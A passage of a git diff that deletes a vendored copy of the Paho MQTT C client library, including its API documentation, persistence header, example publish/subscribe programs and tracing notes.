-  * An error code is returned if there was a problem accepting the message.
-  */
-DLLExport int MQTTClient_publish(MQTTClient handle, const char* topicName, int payloadlen, void* payload, int qos, int retained,
-																 MQTTClient_deliveryToken* dt);
-/**
-  * This function attempts to publish a message to a given topic (see also
-  * MQTTClient_publish()). An ::MQTTClient_deliveryToken is issued when
-  * this function returns successfully. If the client application needs to
-  * test for succesful delivery of QoS1 and QoS2 messages, this can be done
-  * either asynchronously or synchronously (see @ref async,
-  * ::MQTTClient_waitForCompletion and MQTTClient_deliveryComplete()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param topicName The topic associated with this message.
-  * @param msg A pointer to a valid MQTTClient_message structure containing
-  * the payload and attributes of the message to be published.
-  * @param dt A pointer to an ::MQTTClient_deliveryToken. This is populated
-  * with a token representing the message when the function returns
-  * successfully. If your application does not use delivery tokens, set this
-  * argument to NULL.
-  * @return ::MQTTCLIENT_SUCCESS if the message is accepted for publication.
-  * An error code is returned if there was a problem accepting the message.
-  */
-DLLExport int MQTTClient_publishMessage(MQTTClient handle, const char* topicName, MQTTClient_message* msg, MQTTClient_deliveryToken* dt);
-
-
-/**
-  * This function is called by the client application to synchronize execution
-  * of the main thread with completed publication of a message. When called,
-  * MQTTClient_waitForCompletion() blocks execution until the message has been
-  * successful delivered or the specified timeout has expired. See @ref async.
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param dt The ::MQTTClient_deliveryToken that represents the message being
-  * tested for successful delivery. Delivery tokens are issued by the
-  * publishing functions MQTTClient_publish() and MQTTClient_publishMessage().
-  * @param timeout The maximum time to wait in milliseconds.
-  * @return ::MQTTCLIENT_SUCCESS if the message was successfully delivered.
-  * An error code is returned if the timeout expires or there was a problem
-  * checking the token.
-  */
-DLLExport int MQTTClient_waitForCompletion(MQTTClient handle, MQTTClient_deliveryToken dt, unsigned long timeout);
-
-
-/**
-  * This function sets a pointer to an array of delivery tokens for
-  * messages that are currently in-flight (pending completion).
-  *
-  * <b>Important note:</b> The memory used to hold the array of tokens is
-  * malloc()'d in this function. The client application is responsible for
-  * freeing this memory when it is no longer required.
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param tokens The address of a pointer to an ::MQTTClient_deliveryToken.
-  * When the function returns successfully, the pointer is set to point to an
-  * array of tokens representing messages pending completion. The last member of
-  * the array is set to -1 to indicate there are no more tokens. If no tokens
-  * are pending, the pointer is set to NULL.
-  * @return ::MQTTCLIENT_SUCCESS if the function returns successfully.
-  * An error code is returned if there was a problem obtaining the list of
-  * pending tokens.
-  */
-DLLExport int MQTTClient_getPendingDeliveryTokens(MQTTClient handle, MQTTClient_deliveryToken **tokens);
-
-/**
-  * When implementing a single-threaded client, call this function periodically
-  * to allow processing of message retries and to send MQTT keepalive pings.
-  * If the application is calling MQTTClient_receive() regularly, then it is
-  * not necessary to call this function.
-  */
-DLLExport void MQTTClient_yield(void);
-
-/**
-  * This function performs a synchronous receive of incoming messages. It should
-  * be used only when the client application has not set callback methods to
-  * support asynchronous receipt of messages (see @ref async and
-  * MQTTClient_setCallbacks()). Using this function allows a single-threaded
-  * client subscriber application to be written. When called, this function
-  * blocks until the next message arrives or the specified timeout expires
-  *(see also MQTTClient_yield()).
-  *
-  * <b>Important note:</b> The application must free() the memory allocated
-  * to the topic and the message when processing is complete (see
-  * MQTTClient_freeMessage()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param topicName The address of a pointer to a topic. This function
-  * allocates the memory for the topic and returns it to the application
-  * by setting <i>topicName</i> to point to the topic.
-  * @param topicLen The length of the topic. If the return code from this
-  * function is ::MQTTCLIENT_TOPICNAME_TRUNCATED, the topic contains embedded
-  * NULL characters and the full topic should be retrieved by using
-  * <i>topicLen</i>.
-  * @param message The address of a pointer to the received message. This
-  * function allocates the memory for the message and returns it to the
-  * application by setting <i>message</i> to point to the received message.
-  * The pointer is set to NULL if the timeout expires.
-  * @param timeout The length of time to wait for a message in milliseconds.
-  * @return ::MQTTCLIENT_SUCCESS or ::MQTTCLIENT_TOPICNAME_TRUNCATED if a
-  * message is received. ::MQTTCLIENT_SUCCESS can also indicate that the
-  * timeout expired, in which case <i>message</i> is NULL. An error code is
-  * returned if there was a problem trying to receive a message.
-  */
-DLLExport int MQTTClient_receive(MQTTClient handle, char** topicName, int* topicLen, MQTTClient_message** message,
-		unsigned long timeout);
-
-/**
-  * This function frees memory allocated to an MQTT message, including the
-  * additional memory allocated to the message payload. The client application
-  * calls this function when the message has been fully processed. <b>Important
-  * note:</b> This function does not free the memory allocated to a message
-  * topic string. It is the responsibility of the client application to free
-  * this memory using the MQTTClient_free() library function.
-  * @param msg The address of a pointer to the ::MQTTClient_message structure
-  * to be freed.
-  */
-DLLExport void MQTTClient_freeMessage(MQTTClient_message** msg);
-
-/**
-  * This function frees memory allocated by the MQTT C client library, especially the
-  * topic name. This is needed on Windows when the client libary and application
-  * program have been compiled with different versions of the C compiler.  It is
-  * thus good policy to always use this function when freeing any MQTT C client-
-  * allocated memory.
-  * @param ptr The pointer to the client library storage to be freed.
-  */
-DLLExport void MQTTClient_free(void* ptr);
-
-/**
-  * This function frees the memory allocated to an MQTT client (see
-  * MQTTClient_create()). It should be called when the client is no longer
-  * required.
-  * @param handle A pointer to the handle referring to the ::MQTTClient
-  * structure to be freed.
-  */
-DLLExport void MQTTClient_destroy(MQTTClient* handle);
-
-#endif
-#ifdef __cplusplus
-     }
-#endif
-
-/**
-  * @cond MQTTClient_main
-  * @page async Asynchronous vs synchronous client applications
-  * The client library supports two modes of operation. These are referred to
-  * as <b>synchronous</b> and <b>asynchronous</b> modes. If your application
-  * calls MQTTClient_setCallbacks(), this puts the client into asynchronous
-  * mode, otherwise it operates in synchronous mode.
-  *
-  * In synchronous mode, the client application runs on a single thread.
-  * Messages are published using the MQTTClient_publish() and
-  * MQTTClient_publishMessage() functions. To determine that a QoS1 or QoS2
-  * (see @ref qos) message has been successfully delivered, the application
-  * must call the MQTTClient_waitForCompletion() function. An example showing
-  * synchronous publication is shown in @ref pubsync. Receiving messages in
-  * synchronous mode uses the MQTTClient_receive() function. Client applications
-  * must call either MQTTClient_receive() or MQTTClient_yield() relatively
-  * frequently in order to allow processing of acknowledgements and the MQTT
-  * "pings" that keep the network connection to the server alive.
-  *
-  * In asynchronous mode, the client application runs on several threads. The
-  * main program calls functions in the client library to publish and subscribe,
-  * just as for the synchronous mode. Processing of handshaking and maintaining
-  * the network connection is performed in the background, however.
-  * Notifications of status and message reception are provided to the client
-  * application using callbacks registered with the library by the call to
-  * MQTTClient_setCallbacks() (see MQTTClient_messageArrived(),
-  * MQTTClient_connectionLost() and MQTTClient_deliveryComplete()).
-  * This API is not thread safe however - it is not possible to call it from multiple
-  * threads without synchronization.  You can use the MQTTAsync API for that.
-  *
-  * @page wildcard Subscription wildcards
-  * Every MQTT message includes a topic that classifies it. MQTT servers use
-  * topics to determine which subscribers should receive messages published to
-  * the server.
-  *
-  * Consider the server receiving messages from several environmental sensors.
-  * Each sensor publishes its measurement data as a message with an associated
-  * topic. Subscribing applications need to know which sensor originally
-  * published each received message. A unique topic is thus used to identify
-  * each sensor and measurement type. Topics such as SENSOR1TEMP,
-  * SENSOR1HUMIDITY, SENSOR2TEMP and so on achieve this but are not very
-  * flexible. If additional sensors are added to the system at a later date,
-  * subscribing applications must be modified to receive them.
-  *
-  * To provide more flexibility, MQTT supports a hierarchical topic namespace.
-  * This allows application designers to organize topics to simplify their
-  * management. Levels in the hierarchy are delimited by the '/' character,
-  * such as SENSOR/1/HUMIDITY. Publishers and subscribers use these
-  * hierarchical topics as already described.
-  *
-  * For subscriptions, two wildcard characters are supported:
-  * <ul>
-  * <li>A '#' character represents a complete sub-tree of the hierarchy and
-  * thus must be the last character in a subscription topic string, such as
-  * SENSOR/#. This will match any topic starting with SENSOR/, such as
-  * SENSOR/1/TEMP and SENSOR/2/HUMIDITY.</li>
-  * <li> A '+' character represents a single level of the hierarchy and is
-  * used between delimiters. For example, SENSOR/+/TEMP will match
-  * SENSOR/1/TEMP and SENSOR/2/TEMP.</li>
-  * </ul>
-  * Publishers are not allowed to use the wildcard characters in their topic
-  * names.
-  *
-  * Deciding on your topic hierarchy is an important step in your system design.
-  *
-  * @page qos Quality of service
-  * The MQTT protocol provides three qualities of service for delivering
-  * messages between clients and servers: "at most once", "at least once" and
-  * "exactly once".
-  *
-  * Quality of service (QoS) is an attribute of an individual message being
-  * published. An application sets the QoS for a specific message by setting the
-  * MQTTClient_message.qos field to the required value.
-  *
-  * A subscribing client can set the maximum quality of service a server uses
-  * to send messages that match the client subscriptions. The
-  * MQTTClient_subscribe() and MQTTClient_subscribeMany() functions set this
-  * maximum. The QoS of a message forwarded to a subscriber thus might be
-  * different to the QoS given to the message by the original publisher.
-  * The lower of the two values is used to forward a message.
-  *
-  * The three levels are:
-  *
-  * <b>QoS0, At most once:</b> The message is delivered at most once, or it
-  * may not be delivered at all. Its delivery across the network is not
-  * acknowledged. The message is not stored. The message could be lost if the
-  * client is disconnected, or if the server fails. QoS0 is the fastest mode of
-  * transfer. It is sometimes called "fire and forget".
-  *
-  * The MQTT protocol does not require servers to forward publications at QoS0
-  * to a client. If the client is disconnected at the time the server receives
-  * the publication, the publication might be discarded, depending on the
-  * server implementation.
-  *
-  * <b>QoS1, At least once:</b> The message is always delivered at least once.
-  * It might be delivered multiple times if there is a failure before an
-  * acknowledgment is received by the sender. The message must be stored
-  * locally at the sender, until the sender receives confirmation that the
-  * message has been published by the receiver. The message is stored in case
-  * the message must be sent again.
-  *
-  * <b>QoS2, Exactly once:</b> The message is always delivered exactly once.
-  * The message must be stored locally at the sender, until the sender receives
-  * confirmation that the message has been published by the receiver. The
-  * message is stored in case the message must be sent again. QoS2 is the
-  * safest, but slowest mode of transfer. A more sophisticated handshaking
-  * and acknowledgement sequence is used than for QoS1 to ensure no duplication
-  * of messages occurs.
-  * @page pubsync Synchronous publication example
-@code
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    MQTTClient_message pubmsg = MQTTClient_message_initializer;
-    MQTTClient_deliveryToken token;
-    int rc;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    pubmsg.payload = PAYLOAD;
-    pubmsg.payloadlen = strlen(PAYLOAD);
-    pubmsg.qos = QOS;
-    pubmsg.retained = 0;
-    MQTTClient_publishMessage(client, TOPIC, &pubmsg, &token);
-    printf("Waiting for up to %d seconds for publication of %s\n"
-            "on topic %s for client with ClientID: %s\n",
-            (int)(TIMEOUT/1000), PAYLOAD, TOPIC, CLIENTID);
-    rc = MQTTClient_waitForCompletion(client, token, TIMEOUT);
-    printf("Message with delivery token %d delivered\n", token);
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
-
-  * @endcode
-  *
-  * @page pubasync Asynchronous publication example
-@code{.c}
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTClient_deliveryToken deliveredtoken;
-
-void delivered(void *context, MQTTClient_deliveryToken dt)
-{
-    printf("Message with token value %d delivery confirmed\n", dt);
-    deliveredtoken = dt;
-}
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTClient_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTClient_freeMessage(&message);
-    MQTTClient_free(topicName);
-    return 1;
-}
-
-void connlost(void *context, char *cause)
-{
-    printf("\nConnection lost\n");
-    printf("     cause: %s\n", cause);
-}
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    MQTTClient_message pubmsg = MQTTClient_message_initializer;
-    MQTTClient_deliveryToken token;
-    int rc;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    MQTTClient_setCallbacks(client, NULL, connlost, msgarrvd, delivered);
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    pubmsg.payload = PAYLOAD;
-    pubmsg.payloadlen = strlen(PAYLOAD);
-    pubmsg.qos = QOS;
-    pubmsg.retained = 0;
-    deliveredtoken = 0;
-    MQTTClient_publishMessage(client, TOPIC, &pubmsg, &token);
-    printf("Waiting for publication of %s\n"
-            "on topic %s for client with ClientID: %s\n",
-            PAYLOAD, TOPIC, CLIENTID);
-    while(deliveredtoken != token);
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
-
-  * @endcode
-  * @page subasync Asynchronous subscription example
-@code
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientSub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTClient_deliveryToken deliveredtoken;
-
-void delivered(void *context, MQTTClient_deliveryToken dt)
-{
-    printf("Message with token value %d delivery confirmed\n", dt);
-    deliveredtoken = dt;
-}
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTClient_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTClient_freeMessage(&message);
-    MQTTClient_free(topicName);
-    return 1;
-}
-
-void connlost(void *context, char *cause)
-{
-    printf("\nConnection lost\n");
-    printf("     cause: %s\n", cause);
-}
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    int rc;
-    int ch;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    MQTTClient_setCallbacks(client, NULL, connlost, msgarrvd, delivered);
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    printf("Subscribing to topic %s\nfor client %s using QoS%d\n\n"
-           "Press Q<Enter> to quit\n\n", TOPIC, CLIENTID, QOS);
-    MQTTClient_subscribe(client, TOPIC, QOS);
-
-    do
-    {
-        ch = getchar();
-    } while(ch!='Q' && ch != 'q');
-
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
-
-  * @endcode
-  * @page tracing Tracing
-  *
-  * Runtime tracing is controlled by environment variables.
-  *
-  * Tracing is switched on by setting MQTT_C_CLIENT_TRACE.  A value of ON, or stdout, prints to
-  * stdout, any other value is interpreted as a file name to use.
-  *
-  * The amount of trace detail is controlled with the MQTT_C_CLIENT_TRACE_LEVEL environment
-  * variable - valid values are ERROR, PROTOCOL, MINIMUM, MEDIUM and MAXIMUM
-  * (from least to most verbose).
-  *
-  * The variable MQTT_C_CLIENT_TRACE_MAX_LINES limits the number of lines of trace that are output
-  * to a file.  Two files are used at most, when they are full, the last one is overwritten with the
-  * new trace entries.  The default size is 1000 lines.
-  *
-  * ### MQTT Packet Tracing
-  *
-  * A feature that can be very useful is printing the MQTT packets that are sent and received.  To
-  * achieve this, use the following environment variable settings:
-  * @code
-    MQTT_C_CLIENT_TRACE=ON
-    MQTT_C_CLIENT_TRACE_LEVEL=PROTOCOL
-  * @endcode
-  * The output you should see looks like this:
-  * @code
-    20130528 155936.813 3 stdout-subscriber -> CONNECT cleansession: 1 (0)
-    20130528 155936.813 3 stdout-subscriber <- CONNACK rc: 0
-    20130528 155936.813 3 stdout-subscriber -> SUBSCRIBE msgid: 1 (0)
-    20130528 155936.813 3 stdout-subscriber <- SUBACK msgid: 1
-    20130528 155941.818 3 stdout-subscriber -> DISCONNECT (0)
-  * @endcode
-  * where the fields are:
-  * 1. date
-  * 2. time
-  * 3. socket number
-  * 4. client id
-  * 5. direction (-> from client to server, <- from server to client)
-  * 6. packet details
-  *
-  * ### Default Level Tracing
-  *
-  * This is an extract of a default level trace of a call to connect:
-  * @code
-    19700101 010000.000 (1152206656) (0)> MQTTClient_connect:893
-    19700101 010000.000 (1152206656)  (1)> MQTTClient_connectURI:716
-    20130528 160447.479 Connecting to serverURI localhost:1883
-    20130528 160447.479 (1152206656)   (2)> MQTTProtocol_connect:98
-    20130528 160447.479 (1152206656)    (3)> MQTTProtocol_addressPort:48
-    20130528 160447.479 (1152206656)    (3)< MQTTProtocol_addressPort:73
-    20130528 160447.479 (1152206656)    (3)> Socket_new:599
-    20130528 160447.479 New socket 4 for localhost, port 1883
-    20130528 160447.479 (1152206656)     (4)> Socket_addSocket:163
-    20130528 160447.479 (1152206656)      (5)> Socket_setnonblocking:73
-    20130528 160447.479 (1152206656)      (5)< Socket_setnonblocking:78 (0)
-    20130528 160447.479 (1152206656)     (4)< Socket_addSocket:176 (0)
-    20130528 160447.479 (1152206656)     (4)> Socket_error:95
-    20130528 160447.479 (1152206656)     (4)< Socket_error:104 (115)
-    20130528 160447.479 Connect pending
-    20130528 160447.479 (1152206656)    (3)< Socket_new:683 (115)
-    20130528 160447.479 (1152206656)   (2)< MQTTProtocol_connect:131 (115)
-  * @endcode
-  * where the fields are:
-  * 1. date
-  * 2. time
-  * 3. thread id
-  * 4. function nesting level
-  * 5. function entry (>) or exit (<)
-  * 6. function name : line of source code file
-  * 7. return value (if there is one)
-  *
-  * ### Memory Allocation Tracing
-  *
-  * Setting the trace level to maximum causes memory allocations and frees to be traced along with
-  * the default trace entries, with messages like the following:
-  * @code
-    20130528 161819.657 Allocating 16 bytes in heap at file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c line 177 ptr 0x179f930
-
-    20130528 161819.657 Freeing 16 bytes in heap at file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c line 201, heap use now 896 bytes
-  * @endcode
-  * When the last MQTT client object is destroyed, if the trace is being recorded
-  * and all memory allocated by the client library has not been freed, an error message will be
-  * written to the trace.  This can help with fixing memory leaks.  The message will look like this:
-  * @code
-    20130528 163909.208 Some memory not freed at shutdown, possible memory leak
-    20130528 163909.208 Heap scan start, total 880 bytes
-    20130528 163909.208 Heap element size 32, line 354, file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c, ptr 0x260cb00
-    20130528 163909.208   Content
-    20130528 163909.209 Heap scan end
-  * @endcode
-  * @endcond
-  */
diff --git a/thirdparty/paho.mqtt.c/src/MQTTClientPersistence.h b/thirdparty/paho.mqtt.c/src/MQTTClientPersistence.h
deleted file mode 100644
index 4c9014d..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTClientPersistence.h
+++ /dev/null
@@ -1,254 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2012 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-/**
- * @file
- * \brief This structure represents a persistent data store, used to store 
- * outbound and inbound messages, in order to achieve reliable messaging.
- *
- * The MQTT Client persists QoS1 and QoS2 messages in order to meet the
- * assurances of delivery associated with these @ref qos levels. The messages 
- * are saved in persistent storage
- * The type and context of the persistence implementation are specified when 
- * the MQTT client is created (see MQTTClient_create()). The default 
- * persistence type (::MQTTCLIENT_PERSISTENCE_DEFAULT) uses a file system-based
- * persistence mechanism. The <i>persistence_context</i> argument passed to 
- * MQTTClient_create() when using the default peristence is a string 
- * representing the location of the persistence directory. If the context 
- * argument is NULL, the working directory will be used. 
- *
- * To use memory-based persistence, an application passes 
- * ::MQTTCLIENT_PERSISTENCE_NONE as the <i>persistence_type</i> to 
- * MQTTClient_create(). This can lead to message loss in certain situations, 
- * but can be appropriate in some cases (see @ref qos).
- *
- * Client applications can provide their own persistence mechanism by passing
- * ::MQTTCLIENT_PERSISTENCE_USER as the <i>persistence_type</i>. To implement a
- * custom persistence mechanism, the application must pass an initialized
- * ::MQTTClient_persistence structure as the <i>persistence_context</i> 
- * argument to MQTTClient_create().
- *
- * If the functions defined return an ::MQTTCLIENT_PERSISTENCE_ERROR then the 
- * state of the persisted data should remain as it was prior to the function 
- * being called. For example, if Persistence_put() returns 
- * ::MQTTCLIENT_PERSISTENCE_ERROR, then it is assumed tha tthe persistent store
- * does not contain the data that was passed to the function. Similarly,  if 
- * Persistence_remove() returns ::MQTTCLIENT_PERSISTENCE_ERROR then it is 
- * assumed that the data to be removed is still held in the persistent store.
- *
- * It is up to the persistence implementation to log any error information that
- * may be required to diagnose a persistence mechanism failure.
- */
-
-/*
-/// @cond EXCLUDE
-*/
-#if !defined(MQTTCLIENTPERSISTENCE_H)
-#define MQTTCLIENTPERSISTENCE_H
-/*
-/// @endcond
-*/
-
-/**
-  * This <i>persistence_type</i> value specifies the default file system-based 
-  * persistence mechanism (see MQTTClient_create()).
-  */
-#define MQTTCLIENT_PERSISTENCE_DEFAULT 0
-/**
-  * This <i>persistence_type</i> value specifies a memory-based 
-  * persistence mechanism (see MQTTClient_create()).
-  */
-#define MQTTCLIENT_PERSISTENCE_NONE 1
-/**
-  * This <i>persistence_type</i> value specifies an application-specific 
-  * persistence mechanism (see MQTTClient_create()).
-  */
-#define MQTTCLIENT_PERSISTENCE_USER 2
-
-/** 
-  * Application-specific persistence functions must return this error code if 
-  * there is a problem executing the function. 
-  */
-#define MQTTCLIENT_PERSISTENCE_ERROR -2
-
-/**
-  * @brief Initialize the persistent store.
-  * 
-  * Either open the existing persistent store for this client ID or create a new
-  * one if one doesn't exist. If the persistent store is already open, return 
-  * without taking any action.
-  *
-  * An application can use the same client identifier to connect to many
-  * different servers. The <i>clientid</i> in conjunction with the 
-  * <i>serverURI</i> uniquely identifies the persistence store required.
-  *
-  * @param handle The address of a pointer to a handle for this persistence 
-  * implementation. This function must set handle to a valid reference to the 
-  * persistence following a successful return. 
-  * The handle pointer is passed as an argument to all the other
-  * persistence functions. It may include the context parameter and/or any other
-  * data for use by the persistence functions.
-  * @param clientID The client identifier for which the persistent store should 
-  * be opened.
-  * @param serverURI The connection string specified when the MQTT client was
-  * created (see MQTTClient_create()).
-  * @param context A pointer to any data required to initialize the persistent
-  * store (see ::MQTTClient_persistence).
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_open)(void** handle, const char* clientID, const char* serverURI, void* context);
-
-/**
-  * @brief Close the persistent store referred to by the handle.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_close)(void* handle); 
-
-/**
-  * @brief Put the specified data into the persistent store.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @param key A string used as the key for the data to be put in the store. The
-  * key is later used to retrieve data from the store with Persistence_get().
-  * @param bufcount The number of buffers to write to the persistence store.
-  * @param buffers An array of pointers to the data buffers associated with 
-  * this <i>key</i>.
-  * @param buflens An array of lengths of the data buffers. <i>buflen[n]</i> 
-  * gives the length of <i>buffer[n]</i>.
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_put)(void* handle, char* key, int bufcount, char* buffers[], int buflens[]);
-
-/**
-  * @brief Retrieve the specified data from the persistent store. 
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @param key A string that is the key for the data to be retrieved. This is 
-  * the same key used to save the data to the store with Persistence_put().
-  * @param buffer The address of a pointer to a buffer. This function sets the
-  * pointer to point at the retrieved data, if successful.
-  * @param buflen The address of an int that is set to the length of 
-  * <i>buffer</i> by this function if successful.
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_get)(void* handle, char* key, char** buffer, int* buflen);
-
-/**
-  * @brief Remove the data for the specified key from the store.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @param key A string that is the key for the data to be removed from the
-  * store. This is the same key used to save the data to the store with 
-  * Persistence_put().
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_remove)(void* handle, char* key);
-
-/**
-  * @brief Returns the keys in this persistent data store.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @param keys The address of a pointer to pointers to strings. Assuming
-  * successful execution, this function allocates memory to hold the returned
-  * keys (strings used to store the data with Persistence_put()). It also 
-  * allocates memory to hold an array of pointers to these strings. <i>keys</i>
-  * is set to point to the array of pointers to strings.
-  * @param nkeys A pointer to the number of keys in this persistent data store. 
-  * This function sets the number of keys, if successful.
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_keys)(void* handle, char*** keys, int* nkeys);
-
-/**
-  * @brief Clears the persistence store, so that it no longer contains any 
-  * persisted data.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_clear)(void* handle);
-
-/**
-  * @brief Returns whether any data has been persisted using the specified key.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @param key The string to be tested for existence in the store.
-  * @return Return 0 if the key was found in the store, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_containskey)(void* handle, char* key);
-
-/**
-  * @brief A structure containing the function pointers to a persistence 
-  * implementation and the context or state that will be shared across all 
-  * the persistence functions.
-  */
-typedef struct {
-  /** 
-    * A pointer to any data required to initialize the persistent store.
-    */
-	void* context;
-  /** 
-    * A function pointer to an implementation of Persistence_open().
-    */
-	Persistence_open popen;
-  /** 
-    * A function pointer to an implementation of Persistence_close().
-    */
-	Persistence_close pclose;
-  /**
-    * A function pointer to an implementation of Persistence_put().
-    */
-	Persistence_put pput;
-  /** 
-    * A function pointer to an implementation of Persistence_get().
-    */
-	Persistence_get pget;
-  /** 
-    * A function pointer to an implementation of Persistence_remove().
-    */
-	Persistence_remove premove;
-  /** 
-    * A function pointer to an implementation of Persistence_keys().
-    */
-	Persistence_keys pkeys;
-  /** 
-    * A function pointer to an implementation of Persistence_clear().
-    */
-	Persistence_clear pclear;
-  /** 
-    * A function pointer to an implementation of Persistence_containskey().
-    */
-	Persistence_containskey pcontainskey;
-} MQTTClient_persistence;
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPacket.c b/thirdparty/paho.mqtt.c/src/MQTTPacket.c
deleted file mode 100644
index c21a432..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPacket.c
+++ /dev/null
@@ -1,755 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 support
- *******************************************************************************/
-
-/**
- * @file
- * \brief functions to deal with reading and writing of MQTT packets from and to sockets
- *
- * Some other related functions are in the MQTTPacketOut module
- */
-
-#include "MQTTPacket.h"
-#include "Log.h"
-#if !defined(NO_PERSISTENCE)
-	#include "MQTTPersistence.h"
-#endif
-#include "Messages.h"
